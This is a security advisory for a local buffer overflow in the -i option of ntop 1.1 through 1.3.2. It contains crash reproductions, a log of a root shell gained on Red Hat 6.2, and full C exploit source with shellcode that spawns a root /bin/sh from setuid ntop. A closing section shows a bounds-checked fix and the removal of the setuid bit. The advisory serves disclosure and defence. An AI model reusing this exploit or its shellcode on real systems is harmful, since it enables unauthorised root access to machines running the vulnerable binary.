Ntop Exploitable Buffer Overflow
Vulnerability
 ntop
Affected
 ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2
Description
 Christophe Bailleux found the following. All ntop versions are
 vulnerable to a local buffer overflow attack in their -i option.
 Ntop must be owned by root with the setuid bit set for the attacker
 to gain root privileges.
 a) ntop 1.1
 tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
 ntop v.1.1 MT [i686-pc-linux-gnu] listening on AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Host Act -Rcvd- Sent TCP UDP ICMP
 Segmentation fault
 tshaw:/home/cb/SRCAUDIT/ntop-1.1$
 b) ntop 1.2a7
 tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
 Segmentation fault
 tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$
 c) ntop 1.3.1
 tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
 Segmentation fault
 tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$
 d) ntop 1.3.2
 tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`
 24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build)
 24/Oct/2000:12:32:16 Listening on
 [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
 24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
 24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
 24/Oct/2000:12:32:16 Initialising...
 Segmentation fault
 tshaw:/home/cb/ntop-1.3.2$
 The exploit was tested on Red Hat 6.2 (Zoot), where ntop is installed
 by default setuid root.
 [cb@nux cb]$ cat /etc/redhat-release
 Red Hat Linux release 6.2 (Zoot)
 [cb@nux cb]$ rpm -qf /sbin/ntop
 ntop-1.1-1
 [cb@nux cb]$ id
 uid=535(cb) gid=535(cb) groups=535(cb)
 [cb@nux cb]$ ./expl
 ntop v.1.1 MT [i586-pc-linux-gnu] listening on
 ..............................
 Host Act -Rcvd- Sent TCP UDP ICMP
 bash#
 bash# id
 uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
 bash# exit
 [cb@nux cb]$
 Exploit:
 #include <stdlib.h>
 #include <string.h>
 #include <stdio.h>
 
 #define LEN 208
 
 int main (int argc, char **argv)
 {
 char buf[LEN + 12];
 int ret = 0xbffffba0;
 int *p;
 
 char code[]=
 "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
 "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";
 
 if (argc> 1) {
 ret += atoi(argv[1]);
 fprintf(stderr, "Using ret %#010x\n", ret);
 }
 
 memset(buf, '\x90', LEN);
 memcpy(buf + LEN - strlen(code), code, strlen(code));
 
 p = (int *) (buf + LEN);
 
 *p++ = ret;
 *p++ = ret;
 *p = 0;
 
 execl("./ntop", "ntop", "-i", buf, NULL);
 
 }
Solution
 Upgrade to latest version.
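 The class of fix for the -i overflow described above, as an added example (not ntop's source and not part of the original advisory): an unbounded copy of the argument beside a version that rejects anything that cannot be an interface name. The function names are hypothetical; IF_NAMESIZE is the POSIX limit from <net/if.h>, and the character check is an assumption about what a sane interface name contains.

```c
#include <ctype.h>
#include <net/if.h>   /* IF_NAMESIZE: max interface name length, NUL included */
#include <stdio.h>
#include <string.h>

/* Unsafe pattern (hypothetical illustration): the argument is copied into a
 * fixed buffer with no length check, so a long -i value overruns dst. */
void set_device_unsafe(char *dst, const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened form: validate, then copy. Rejects instead of truncating so a bad
 * argument is never silently turned into a different interface name.
 * Returns 0 on success, -1 on any invalid input. */
int set_device_checked(char *dst, size_t dstlen, const char *arg)
{
    size_t n, i;

    if (dst == NULL || arg == NULL || dstlen == 0)
        return -1;
    n = strlen(arg);
    if (n == 0 || n >= IF_NAMESIZE || n >= dstlen)
        return -1;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)arg[i];
        /* Assumption: names are printable, with no whitespace or '/'. */
        if (!isgraph(c) || c == '/')
            return -1;
    }
    memcpy(dst, arg, n + 1);   /* n + 1 <= dstlen, includes the NUL */
    return 0;
}

int main(int argc, char **argv)
{
    char device[IF_NAMESIZE];

    if (argc != 2 || set_device_checked(device, sizeof device, argv[1]) != 0) {
        fprintf(stderr, "invalid interface name\n");
        return 1;
    }
    printf("listening on %s\n", device);
    return 0;
}
```

 Independently of the code fix, clearing the setuid bit on the installed binary (chmod u-s) removes the root escalation path the advisory depends on.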
